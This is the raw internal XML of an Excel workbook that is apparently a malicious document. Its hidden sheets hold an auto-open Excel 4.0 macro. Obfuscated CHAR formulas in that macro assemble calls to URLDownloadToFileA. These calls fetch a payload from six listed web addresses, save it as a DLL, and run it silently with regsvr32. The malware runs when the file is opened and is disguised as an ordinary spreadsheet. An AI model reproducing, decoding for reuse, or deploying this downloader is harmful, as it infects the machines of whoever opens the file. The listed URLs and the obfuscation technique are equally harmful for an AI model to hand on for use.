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macrosheets/intlsheet1.xml" ContentType="application/vnd.ms-excel.intlmacro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osik\Desktop\File3\31\Новая папка (2)\CIR\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{F5AAA563-2BE5-4D04-A527-156FA41B3C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  <sheet name="Odjfs" sheetId="2" state="hidden" r:id="rId2"/>
    <sheet name="Dghdb" sheetId="3" state="hidden" r:id="rId3"/>
    <sheet name="Vghsg" sheetId="4" state="hidden" r:id="rId4"/>
    <sheet name="Urgds" sheetId="5" state="hidden" r:id="rId5"/>
    <sheet name="Njkg" sheetId="6" state="hidden" r:id="rId6"/>
    <sheet name="PIMKE" sheetId="7" state="hidden" r:id="rId7"/>
  </sheets>
  <definedNames>
    <definedName name="IVFB1">PIMKE!$C$14</definedName>
    <definedName name="IVFB2">PIMKE!$C$16</definedName>
    <definedName name="IVFB3">PIMKE!$C$18</definedName>
    <definedName name="IVFB4">PIMKE!$C$20</definedName>
    <definedName name="IVFB5">PIMKE!$C$22</definedName>
    <definedName name="IVFB6">PIMKE!$C$24</definedName>
    <definedName name="IVFB7">PIMKE!$C$26</definedName>
    <definedName name="_xlnm.Auto_Open567980">PIMKE!$C$1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R18" i="4"/>
  <c r="J20" i="3"/>
  <c r="J18" i="3"/>
  <c r="H20" i="3"/>
  <c r="H18" i="3"/>
  <c r="F20" i="3"/>
  <c r="F18" i="3"/>
  <c r="B13" i="4"/>
  <c r="S2" i="4"/>
  <c r="L8" i="3"/>
  <c r="I2" i="3"/>
  <c r="E10" i="3"/>
  <c r="C6" i="3"/>
  <c r="K37" i="2"/>
  <c r="Q36" i="2"/>
  <c r="E35" i="2"/>
  <c r="O33" i="2"/>
  <c r="I32" i="2"/>
  <c r="I26" i="2"/>
  <c r="G24" i="2"/>
  <c r="K23" i="2"/>
  <c r="P22" i="2"/>
  <c r="P20" i="2"/>
  <c r="P19" i="2"/>
  <c r="B18" i="2"/>
  <c r="P17" i="2"/>
  <c r="I17" i="2"/>
  <c r="D17" i="2"/>
  <c r="P15" i="2"/>
  <c r="F15" i="2"/>
  <c r="B15" i="2"/>
  <c r="K14" i="2"/>
  <c r="G14" i="2"/>
  <c r="P13" i="2"/>
  <c r="H13" i="2"/>
  <c r="D13" i="2"/>
  <c r="A12" i="2"/>
  <c r="P11" i="2"/>
  <c r="L11" i="2"/>
  <c r="J11" i="2"/>
  <c r="E11" i="2"/>
  <c r="F10" i="2"/>
  <c r="P9" i="2"/>
  <c r="K9" i="2"/>
  <c r="H9" i="2"/>
  <c r="C9" i="2"/>
  <c r="P7" i="2"/>
  <c r="M7" i="2"/>
  <c r="D7" i="2"/>
  <c r="J6" i="2"/>
  <c r="E6" i="2"/>
  <c r="P5" i="2"/>
  <c r="B5" i="2"/>
  <c r="N4" i="2"/>
  <c r="H4" i="2"/>
  <c r="F4" i="2"/>
  <c r="P3" i="2"/>
  <c r="I3" i="2"/>
  <c r="C3" i="2"/>
  <c r="L2" i="2"/>
  <c r="G2" i="2"/>
  <c r="E2" i="2"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="19" uniqueCount="19">
  <si>
    <t>-</t>
  </si>
  <si>
    <t>G</t>
  </si>
  <si>
    <t>p</t>
  </si>
  <si>
    <t>h</t>
  </si>
  <si>
    <t>t</t>
  </si>
  <si>
    <t>!</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;0, </t>
  </si>
  <si>
    <t>SysWow64\</t>
  </si>
  <si>
    <t>\Windows\</t>
  </si>
  <si>
    <t>",0,0)</t>
  </si>
  <si>
    <t>,0,"</t>
  </si>
  <si>
    <t>r"&amp;"egsv"&amp;"r"&amp;"32.exe</t>
  </si>
  <si>
    <t>http://eles-tech.com/css/KzMysMqFMs/</t>
  </si>
  <si>
    <t>http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/</t>
  </si>
  <si>
    <t>https://txpcrescue.com/cgi-bin/5tSO8/</t>
  </si>
  <si>
    <t>http://hadramout21.com/jetpack-temp/Py/</t>
  </si>
  <si>
    <t>http://haribuilders.com/zoombox-master/4HYGX/</t>
  </si>
  <si>
    <t>http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/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</si>
</sst>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D4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6/relationships/xlIntlMacrosheet" Target="macrosheets/intl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348246</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>266700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E32E043-9F7A-4D41-B5AA-4FB1C1305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01846" cy="266700"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/macrosheets/intlsheet1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BC362BF7-69CE-4C03-9251-D371075F71FC}">
  <dimension ref="C10"/>
  <sheetViews>
    <sheetView showFormulas="1" topLeftCell="C5" workbookViewId="0">
      <selection activeCell="C12" sqref="C12"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="3" max="3" width="255.7109375" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="10" spans="3:3" x14ac:dyDescent="0.25">
      <c r="C10" t="b">
        <f>FORMULA(Odjfs!P22&amp;Odjfs!H9&amp;Odjfs!L2&amp;Odjfs!B15&amp;Odjfs!B15&amp;Dghdb!C6&amp;Dghdb!E10&amp;Vghsg!B13&amp;Dghdb!I2&amp;Odjfs!H4&amp;Dghdb!L8&amp;Vghsg!I21&amp;Dghdb!F18&amp;Vghsg!D7&amp;Vghsg!F18,C14)=FORMULA(Odjfs!P22&amp;Odjfs!J11&amp;Odjfs!B18&amp;Odjfs!P11&amp;"IVFB1"&amp;Vghsg!Q7&amp;Odjfs!H9&amp;Odjfs!L2&amp;Odjfs!B15&amp;Odjfs!B15&amp;Dghdb!C6&amp;Dghdb!E10&amp;Vghsg!B13&amp;Dghdb!I2&amp;Odjfs!H4&amp;Dghdb!L8&amp;Vghsg!I21&amp;Dghdb!F20&amp;Vghsg!D7&amp;Vghsg!F18&amp;Odjfs!P13,C16)=FORMULA(Odjfs!P22&amp;Odjfs!J11&amp;Odjfs!B18&amp;Odjfs!P11&amp;"IVFB2"&amp;Vghsg!Q7&amp;Odjfs!H9&amp;Odjfs!L2&amp;Odjfs!B15&amp;Odjfs!B15&amp;Dghdb!C6&amp;Dghdb!E10&amp;Vghsg!B13&amp;Dghdb!I2&amp;Odjfs!H4&amp;Dghdb!L8&amp;Vghsg!I21&amp;Dghdb!H18&amp;Vghsg!D7&amp;Vghsg!F18&amp;Odjfs!P13,C18)=FORMULA(Odjfs!P22&amp;Odjfs!J11&amp;Odjfs!B18&amp;Odjfs!P11&amp;"IVFB3"&amp;Vghsg!Q7&amp;Odjfs!H9&amp;Odjfs!L2&amp;Odjfs!B15&amp;Odjfs!B15&amp;Dghdb!C6&amp;Dghdb!E10&amp;Vghsg!B13&amp;Dghdb!I2&amp;Odjfs!H4&amp;Dghdb!L8&amp;Vghsg!I21&amp;Dghdb!H20&amp;Vghsg!D7&amp;Vghsg!F18&amp;Odjfs!P13,C20)=FORMULA(Odjfs!P22&amp;Odjfs!J11&amp;Odjfs!B18&amp;Odjfs!P11&amp;"IVFB4"&amp;Vghsg!Q7&amp;Odjfs!H9&amp;Odjfs!L2&amp;Odjfs!B15&amp;Odjfs!B15&amp;Dghdb!C6&amp;Dghdb!E10&amp;Vghsg!B13&amp;Dghdb!I2&amp;Odjfs!H4&amp;Dghdb!L8&amp;Vghsg!I21&amp;Dghdb!J18&amp;Vghsg!D7&amp;Vghsg!F18&amp;Odjfs!P13,C22)=FORMULA(Odjfs!P22&amp;Odjfs!J11&amp;Odjfs!B18&amp;Odjfs!P11&amp;"IVFB5"&amp;Vghsg!Q7&amp;Odjfs!H9&amp;Odjfs!L2&amp;Odjfs!B15&amp;Odjfs!B15&amp;Dghdb!C6&amp;Dghdb!E10&amp;Vghsg!B13&amp;Dghdb!I2&amp;Odjfs!H4&amp;Dghdb!L8&amp;Vghsg!I21&amp;Dghdb!J20&amp;Vghsg!D7&amp;Vghsg!F18&amp;Odjfs!P13,C24)=FORMULA(Odjfs!P22&amp;Odjfs!J11&amp;Odjfs!B18&amp;Odjfs!P11&amp;"IVFB6"&amp;Vghsg!Q7&amp;Odjfs!H9&amp;Odjfs!B15&amp;Odjfs!I17&amp;Odjfs!I3&amp;Odjfs!H13&amp;Odjfs!P11&amp;Odjfs!K9&amp;Odjfs!P13&amp;Odjfs!P7&amp;Odjfs!P13,C26)=FORMULA(Odjfs!P22&amp;Odjfs!H13&amp;Odjfs!N4&amp;Odjfs!H13&amp;Odjfs!H9&amp;Odjfs!P11&amp;Odjfs!P15&amp;Odjfs!H9&amp;Odjfs!P20&amp;Vghsg!M14&amp;Vghsg!N10&amp;Vghsg!I6&amp;Vghsg!R18&amp;Vghsg!S2&amp;Odjfs!P15&amp;Odjfs!P13,C28)=FORMULA(Odjfs!P22&amp;Odjfs!F4&amp;Odjfs!H13&amp;Odjfs!E6&amp;Odjfs!E11&amp;Odjfs!G24&amp;Odjfs!K23&amp;Odjfs!P11&amp;Odjfs!P13,C32)</f>
        <v>1</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macro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I854" sqref="AI854"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" s="1" customFormat="1" ht="21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E8EC-A516-49A5-86EB-406DE528FA9B}">
  <dimension ref="A2:Q37"/>
  <sheetViews>
    <sheetView topLeftCell="A7" workbookViewId="0">
      <selection activeCell="C6" sqref="C6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="2" spans="1:16" x14ac:dyDescent="0.25">
      <c r="E2" t="str">
        <f>CHAR(113-2)</f>
        <v>o</v>
      </c>
      <c r="G2" t="str">
        <f>CHAR(111-6)</f>
        <v>i</v>
      </c>
      <c r="L2" t="str">
        <f>CHAR(71-6)</f>
        <v>A</v>
      </c>
      <c r="P2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:16" x14ac:dyDescent="0.25">
      <c r="C3" t="str">
        <f>CHAR(111+3)</f>
        <v>r</v>
      </c>
      <c r="I3" t="str">
        <f>CHAR(87-4)</f>
        <v>S</v>
      </c>
      <c r="P3" t="str">
        <f>CHAR(90+2)</f>
        <v>\</v>
      </c>
    </row>
    <row r="4" spans="1:16" x14ac:dyDescent="0.25">
      <c r="F4" t="str">
        <f>CHAR(100-18)</f>
        <v>R</v>
      </c>
      <c r="H4" t="str">
        <f>CHAR(110-9)</f>
        <v>e</v>
      </c>
      <c r="K4">
        <v>1</v>
      </c>
      <c r="N4" t="str">
        <f>CHAR(89-1)</f>
        <v>X</v>
      </c>
    </row>
    <row r="5" spans="1:16" x14ac:dyDescent="0.25">
      <c r="B5" t="str">
        <f>CHAR(115+2)</f>
        <v>u</v>
      </c>
      <c r="P5" t="str">
        <f>CHAR(44+2)</f>
        <v>.</v>
      </c>
    </row>
    <row r="6" spans="1:16" x14ac:dyDescent="0.25">
      <c r="E6" t="str">
        <f>CHAR(90-6)</f>
        <v>T</v>
      </c>
      <c r="J6" t="str">
        <f>CHAR(77-3)</f>
        <v>J</v>
      </c>
    </row>
    <row r="7" spans="1:16" x14ac:dyDescent="0.25">
      <c r="D7" t="str">
        <f>CHAR(107+3)</f>
        <v>n</v>
      </c>
      <c r="F7">
        <v>3</v>
      </c>
      <c r="M7" t="str">
        <f>CHAR(117-2)</f>
        <v>s</v>
      </c>
      <c r="P7" t="str">
        <f>CHAR(41+3)</f>
        <v>,</v>
      </c>
    </row>
    <row r="9" spans="1:16" x14ac:dyDescent="0.25">
      <c r="C9" t="str">
        <f>CHAR(110-2)</f>
        <v>l</v>
      </c>
      <c r="H9" t="str">
        <f>CHAR(70-3)</f>
        <v>C</v>
      </c>
      <c r="K9" t="str">
        <f>CHAR(55-7)</f>
        <v>0</v>
      </c>
      <c r="P9" t="str">
        <f>CHAR(55+5)</f>
        <v>&lt;</v>
      </c>
    </row>
    <row r="10" spans="1:16" x14ac:dyDescent="0.25">
      <c r="F10" t="str">
        <f>CHAR(123-4)</f>
        <v>w</v>
      </c>
    </row>
    <row r="11" spans="1:16" x14ac:dyDescent="0.25">
      <c r="E11" t="str">
        <f>CHAR(80+5)</f>
        <v>U</v>
      </c>
      <c r="J11" t="str">
        <f>CHAR(80-7)</f>
        <v>I</v>
      </c>
      <c r="L11" t="str">
        <f>CHAR(100-1)</f>
        <v>c</v>
      </c>
      <c r="P11" t="str">
        <f>CHAR(35+5)</f>
        <v>(</v>
      </c>
    </row>
    <row r="12" spans="1:16" x14ac:dyDescent="0.25">
      <c r="A12" t="str">
        <f>CHAR(107+2)</f>
        <v>m</v>
      </c>
    </row>
    <row r="13" spans="1:16" x14ac:dyDescent="0.25">
      <c r="D13" t="str">
        <f>CHAR(72-4)</f>
        <v>D</v>
      </c>
      <c r="H13" t="str">
        <f>CHAR(68+1)</f>
        <v>E</v>
      </c>
      <c r="N13">
        <v>2</v>
      </c>
      <c r="P13" t="str">
        <f>CHAR(36+5)</f>
        <v>)</v>
      </c>
    </row>
    <row r="14" spans="1:16" x14ac:dyDescent="0.25">
      <c r="G14" t="str">
        <f>CHAR(124-4)</f>
        <v>x</v>
      </c>
      <c r="K14" t="str">
        <f>CHAR(70-4)</f>
        <v>B</v>
      </c>
    </row>
    <row r="15" spans="1:16" x14ac:dyDescent="0.25">
      <c r="B15" t="str">
        <f>CHAR(80-4)</f>
        <v>L</v>
      </c>
      <c r="F15" t="str">
        <f>CHAR(105-5)</f>
        <v>d</v>
      </c>
      <c r="P15" t="str">
        <f>CHAR(31+3)</f>
        <v>"</v>
      </c>
    </row>
    <row r="17" spans="2:16" x14ac:dyDescent="0.25">
      <c r="D17" t="str">
        <f>CHAR(102-5)</f>
        <v>a</v>
      </c>
      <c r="I17" t="str">
        <f>CHAR(78+1)</f>
        <v>O</v>
      </c>
      <c r="K17" t="s">
        <v>1</v>
      </c>
      <c r="N17" t="s">
        <v>2</v>
      </c>
      <c r="P17" t="str">
        <f>CHAR(40-2)</f>
        <v>&amp;</v>
      </c>
    </row>
    <row r="18" spans="2:16" x14ac:dyDescent="0.25">
      <c r="B18" t="str">
        <f>CHAR(65+5)</f>
        <v>F</v>
      </c>
    </row>
    <row r="19" spans="2:16" x14ac:dyDescent="0.25">
      <c r="F19" t="s">
        <v>3</v>
      </c>
      <c r="L19" t="s">
        <v>4</v>
      </c>
      <c r="P19" t="str">
        <f>CHAR(32)</f>
        <v xml:space="preserve"> </v>
      </c>
    </row>
    <row r="20" spans="2:16" x14ac:dyDescent="0.25">
      <c r="H20">
        <v>8</v>
      </c>
      <c r="P20" t="str">
        <f>CHAR(52+6)</f>
        <v>:</v>
      </c>
    </row>
    <row r="22" spans="2:16" x14ac:dyDescent="0.25">
      <c r="P22" t="str">
        <f>CHAR(66-5)</f>
        <v>=</v>
      </c>
    </row>
    <row r="23" spans="2:16" x14ac:dyDescent="0.25">
      <c r="K23" t="str">
        <f>CHAR(80-2)</f>
        <v>N</v>
      </c>
    </row>
    <row r="24" spans="2:16" x14ac:dyDescent="0.25">
      <c r="G24" t="str">
        <f>CHAR(84-2)</f>
        <v>R</v>
      </c>
      <c r="P24" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="26" spans="2:16" x14ac:dyDescent="0.25">
      <c r="I26" t="str">
        <f>CHAR(84)</f>
        <v>T</v>
      </c>
    </row>
    <row r="27" spans="2:16" x14ac:dyDescent="0.25">
      <c r="P27" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="32" spans="2:16" x14ac:dyDescent="0.25">
      <c r="I32">
        <f>_xlfn.ARABIC("CXI")</f>
        <v>111</v>
      </c>
    </row>
    <row r="33" spans="5:17" x14ac:dyDescent="0.25">
      <c r="O33">
        <f>_xlfn.ARABIC("LXVII")</f>
        <v>67</v>
      </c>
    </row>
    <row r="35" spans="5:17" x14ac:dyDescent="0.25">
      <c r="E35">
        <f>_xlfn.ARABIC("LXI")</f>
        <v>61</v>
      </c>
    </row>
    <row r="36" spans="5:17" x14ac:dyDescent="0.25">
      <c r="Q36">
        <f>_xlfn.ARABIC("CXIV")</f>
        <v>114</v>
      </c>
    </row>
    <row r="37" spans="5:17" x14ac:dyDescent="0.25">
      <c r="K37">
        <f>_xlfn.ARABIC("CI")</f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35B4-3B66-425C-8748-CA5CB518D8D3}">
  <dimension ref="C2:L20"/>
  <sheetViews>
    <sheetView topLeftCell="A4" workbookViewId="0">
      <selection activeCell="G16" sqref="G16"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="2" spans="3:12" x14ac:dyDescent="0.25">
      <c r="I2" t="str">
        <f>T(Odjfs!F15&amp;Odjfs!E6&amp;Odjfs!E2&amp;Odjfs!B18&amp;Odjfs!G2&amp;Odjfs!C9)</f>
        <v>dToFil</v>
      </c>
    </row>
    <row r="6" spans="3:12" x14ac:dyDescent="0.25">
      <c r="C6" t="str">
        <f>T(Odjfs!P11&amp;Odjfs!P15&amp;Odjfs!B5&amp;Odjfs!C3&amp;Odjfs!C9)</f>
        <v>("url</v>
      </c>
    </row>
    <row r="8" spans="3:12" x14ac:dyDescent="0.25">
      <c r="L8" t="str">
        <f>T(Odjfs!L2&amp;Odjfs!P15&amp;Odjfs!P7&amp;Odjfs!P15&amp;Odjfs!J6&amp;Odjfs!J6&amp;Odjfs!H9&amp;Odjfs!H9&amp;Odjfs!K14&amp;Odjfs!K14&amp;Odjfs!P15)</f>
        <v>A","JJCCBB"</v>
      </c>
    </row>
    <row r="10" spans="3:12" x14ac:dyDescent="0.25">
      <c r="E10" t="str">
        <f>T(Odjfs!A12&amp;Odjfs!E2&amp;Odjfs!D7&amp;Odjfs!P15&amp;Odjfs!P7&amp;Odjfs!P15&amp;Odjfs!E11&amp;Odjfs!F4&amp;Odjfs!B15&amp;Odjfs!D13)</f>
        <v>mon","URLD</v>
      </c>
    </row>
    <row r="18" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F18" t="str">
        <f>T(Urgds!C5)</f>
        <v>http://eles-tech.com/css/KzMysMqFMs/</v>
      </c>
      <c r="G18">
        <v>1</v>
      </c>
      <c r="H18" t="str">
        <f>T(Urgds!G13)</f>
        <v>https://txpcrescue.com/cgi-bin/5tSO8/</v>
      </c>
      <c r="I18">
        <v>3</v>
      </c>
      <c r="J18" t="str">
        <f>T(Njkg!E9)</f>
        <v>http://haribuilders.com/zoombox-master/4HYGX/</v>
      </c>
      <c r="K18">
        <v>5</v>
      </c>
    </row>
    <row r="20" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F20" t="str">
        <f>T(Urgds!E9)</f>
        <v>http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/</v>
      </c>
      <c r="G20">
        <v>2</v>
      </c>
      <c r="H20" t="str">
        <f>T(Njkg!D4)</f>
        <v>http://hadramout21.com/jetpack-temp/Py/</v>
      </c>
      <c r="I20">
        <v>4</v>
      </c>
      <c r="J20" t="str">
        <f>T(Njkg!G13)</f>
        <v>http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/</v>
      </c>
      <c r="K2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C4ED-58EE-4ED4-BEF2-5F15BE76FEE5}">
  <dimension ref="B2:S21"/>
  <sheetViews>
    <sheetView topLeftCell="A4" workbookViewId="0">
      <selection activeCell="I7" sqref="I7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="2" spans="2:19" x14ac:dyDescent="0.25">
      <c r="S2" t="str">
        <f>T(Odjfs!P19&amp;Odjfs!P5&amp;Odjfs!P5&amp;Odjfs!P3&amp;Odjfs!G14&amp;Odjfs!H4&amp;Odjfs!F10&amp;Odjfs!D7&amp;Odjfs!P5&amp;Odjfs!F15&amp;Odjfs!C9&amp;Odjfs!C9)</f>
        <v xml:space="preserve"> ..\xewn.dll</v>
      </c>
    </row>
    <row r="6" spans="2:19" x14ac:dyDescent="0.25">
      <c r="I6" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="7" spans="2:19" x14ac:dyDescent="0.25">
      <c r="D7" t="str">
        <f>T(Odjfs!P15&amp;Odjfs!P7&amp;Odjfs!P15&amp;Odjfs!P5&amp;Odjfs!P5&amp;Odjfs!P3&amp;Odjfs!G14&amp;Odjfs!H4&amp;Odjfs!F10&amp;Odjfs!D7&amp;Odjfs!P5&amp;Odjfs!F15&amp;Odjfs!C9&amp;Odjfs!C9)</f>
        <v>","..\xewn.dll</v>
      </c>
      <c r="Q7" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="10" spans="2:19" x14ac:dyDescent="0.25">
      <c r="N10" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="13" spans="2:19" x14ac:dyDescent="0.25">
      <c r="B13" t="str">
        <f>CONCATENATE(Odjfs!E2,Odjfs!F10,Odjfs!D7,Odjfs!C9,Odjfs!E2,Odjfs!D17)</f>
        <v>ownloa</v>
      </c>
    </row>
    <row r="14" spans="2:19" x14ac:dyDescent="0.25">
      <c r="M14" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="18" spans="6:18" x14ac:dyDescent="0.25">
      <c r="F18" t="s">
        <v>10</v>
      </c>
      <c r="R18" t="str">
        <f>T(Odjfs!P19&amp;Odjfs!P2&amp;Odjfs!M7)</f>
        <v xml:space="preserve"> -s</v>
      </c>
    </row>
    <row r="21" spans="6:18" x14ac:dyDescent="0.25">
      <c r="I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346B-45E2-485A-AB89-294A46426CE9}">
  <dimension ref="C1:O13"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C13" sqref="C13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="3:15" x14ac:dyDescent="0.25">
      <c r="O1">
        <v>11</v>
      </c>
    </row>
    <row r="5" spans="3:15" x14ac:dyDescent="0.25">
      <c r="C5" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="9" spans="3:15" x14ac:dyDescent="0.25">
      <c r="E9" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="13" spans="3:15" x14ac:dyDescent="0.25">
      <c r="G1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4BAF-770B-4A5A-AB74-AA5E902575AB}">
  <dimension ref="B1:G13"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="G12" sqref="G12"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="2:7" x14ac:dyDescent="0.25">
      <c r="B1">
        <v>22</v>
      </c>
    </row>
    <row r="4" spans="2:7" x14ac:dyDescent="0.25">
      <c r="D4" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="9" spans="2:7" x14ac:dyDescent="0.25">
      <c r="E9" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="13" spans="2:7" x14ac:dyDescent="0.25">
      <c r="G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Макросы Excel 4.0</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="7" baseType="lpstr">
      <vt:lpstr>Sheet</vt:lpstr>
      <vt:lpstr>Odjfs</vt:lpstr>
      <vt:lpstr>Dghdb</vt:lpstr>
      <vt:lpstr>Vghsg</vt:lpstr>
      <vt:lpstr>Urgds</vt:lpstr>
      <vt:lpstr>Njkg</vt:lpstr>
      <vt:lpstr>PIMKE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EGSrwhs</dc:creator>
  <cp:lastModifiedBy>RHfdh</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-31T16:51:23Z</dcterms:modified>
</cp:coreProperties>
</file>